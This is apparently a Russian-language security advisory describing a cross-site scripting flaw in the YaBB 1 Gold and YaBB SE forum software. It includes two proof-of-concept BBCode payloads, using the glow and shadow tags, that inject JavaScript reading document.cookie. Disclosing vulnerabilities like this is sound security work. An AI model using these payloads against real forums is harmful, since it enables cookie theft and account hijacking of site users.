Межсайтовый скриптинг в YaBB 1 Gold и YaBB SE

Дата публикации:
17.03.2004
Дата изменения:
17.10.2006
Всего просмотров:
2783
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: YaBB 1 Gold (SP1.3) и YaBB SE 1.5.1

Описание: Уязвимость обнаружена в YaBB. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

URL производителя:http://www.yabbse.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: YaBB/YaBBse Cross Site Scripting Vulnerability

или введите имя

CAPTCHA